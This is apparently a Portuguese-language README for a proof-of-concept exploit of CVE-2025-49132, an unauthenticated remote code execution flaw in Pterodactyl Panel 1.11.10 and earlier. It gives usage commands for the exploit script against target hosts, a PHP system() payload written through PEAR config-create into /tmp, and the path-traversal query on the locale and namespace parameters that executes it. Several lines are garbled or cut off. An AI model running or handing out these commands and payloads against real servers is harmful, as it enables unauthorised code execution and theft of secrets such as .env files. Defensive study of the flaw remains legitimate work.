
Exploit de PoC para CVE-2025-49132 (GHSA-24wv-6c99-f843) – Execução Remota de Código não autenticada no Pterodactyl Panel ≤ 1.11.10
Pterodactyl Panel - Execução Remota de Código Não Autenticada (RCE)
CVE‑2025‑49132 é uma vulnerabilidade crítica de Execução Remota de Código que afeta Pterodactyl Panel <= 1.11.10.
Um atacante não autenticado pode explorar a validação inadequada de entrada no
endpoint /locales/locale.json para executar comandos arbitrários do sistema.
Corrigido na versão: 1.11.11
A exploração bem-sucedida permite:
.env)Gravidade: Crítica
A vulnerabilidade existe devido à validação inadequada de:
localenamespaceUm atacante pode:
../../../../../)config-create/tmpClassificação da fraqueza: CWE-94 -- Controle Impróprio da Geração de Código
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
Caminho padrão:
/usr/share/php/PEAR
Obtenha o caminho correto na página /phpinfo.php

O atacante injeta um payload PHP malicioso em /tmp/payload.php
usando:
/<?=system('id')?>+/tmp/payload.php
Ao chamar:
?locale=../../../../../tmp&namespace=payload
O servidor executa o PHP injetado.

locale e namespace